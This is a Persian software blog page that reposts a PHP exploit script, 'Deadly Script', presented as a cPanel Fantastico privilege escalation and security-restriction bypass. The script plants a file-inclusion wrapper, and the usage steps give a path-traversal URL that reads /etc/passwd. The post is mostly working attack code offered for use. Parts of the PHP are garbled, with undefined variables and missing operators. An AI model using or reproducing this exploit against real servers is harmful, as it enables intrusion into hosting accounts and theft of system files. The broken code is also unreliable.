تبلیغات
مرجع نرم افزار ایرانیان - CPANEL 11 Exploited
مرجع نرم افزار ایرانیان
دانلود نرم افزار های جدید,اس ام اس ,فیلم,تكست رپ,جاوااسكریپ,اسكریپت,cms,قالب وبلاگ,قالب سایت
گروه طراحی قالب من خانه ایرانیان گروه طراحی قالب من گروه طراحی قالب من گروه طراحی قالب من
درباره وبلاگ


برای تبادل لینك آماده هستیم
این سایت تنها برای اطلاع رسانی و آموزش تهیه گردیده است و هیچگونه مسئولیتی در قبال چگونگی استفاده از اطلاعات مندرج در این سایت برعهده نخواهند داشت.

مدیر وبلاگ : محمد
نظرسنجی
چه مطالبی دوست دارید ؟






CPANEL 11 Exploited
PHP Code:
<?php
/*
######################################## 
# Deadly Script  by Super-Crystal 
# bypass Cpanel fantastico 
#######################################
*/
set_time_limit(0);
if(isset(
$_POST['sup3r'])) {
if(
stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) {
$phpwrapper '<?php
include_once("./language/".$_GET[sup3r].".php"); 
?>
'
;
fwrite($h,$prctl);
fclose($h);
$handle fopen($_POST['php'], "w");
fwrite($handle$phpwrapper);
fclose($handle);
echo 
"Building exploit...<br />";
echo 
"coding by Super-Crystal <br />";
echo 
"Cleaning up<br />";
echo 
"Done!<br />
</pre>"
;
} else {
echo 
"error : ".php_uname();
}
} else {
?>
<div align="center">
<h3>Deadly Script</h3>
<font color=red>Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</font><br />
<pre><div align="center">
</pre></div><br />
<table border="0" cellspacing="0">
<tr>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<table border="0" cellspacing="0">
<tr>
<td><div align="right">Exploit:</div></td>
<td>
<select name="exploit">
<option selected="selected">Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</option>
</select>
</td>
</tr>
<tr>
<td><div align="right">change</div></td>
<td><input type="text" name="php" size="50" value="<?php echo getcwd()."/language.php" ?>" /></td>
</tr>
<tr>
</table>
</div>
<input type="hidden" name="sup3r" value="doit" />
<input name="submit" type="submit" value="Submit" /><br />
1- change /home/[user]/.fantasticodata/language.php
<br />
2- click on the submit
<br />
3- now put it like this (e.g) 
: http://www.Your_Domain_Name.com:2082/frontend/x3/fantastico/index.php?sup3r=../../../../../../etc/passwd%00 .
<br />
<font color=red>Written: 10.10.2008</font><br />
<font color=blue>Public: 26.11.2008</font><br />
</form>
<?php ?>
save as exploit.php.
How to use -
Code:
http://zing24h.net/chet.php





آمار وبلاگ
  • کل بازدید :
  • بازدید امروز :
  • بازدید دیروز :
  • بازدید این ماه :
  • بازدید ماه قبل :
  • تعداد نویسندگان :
  • تعداد کل پست ها :
  • آخرین بازدید :
  • آخرین بروز رسانی :
امکانات جانبی
به سایت ما خوش آمدید
نام و نام خانوادگی      
آدرس ایمیل      
کلیه حقوق این وبلاگ برای مرجع نرم افزار ایرانیان محفوظ استآریان پیامک

{headers} ارائه دهنده خدمات پیامک. شامل پیامک برند، پیامک منطقه ای، پیامک انبوه و آریان پیامک | پنل اس ام اس آریان پیامک | پنل اس ام اس » پنل اس ام اس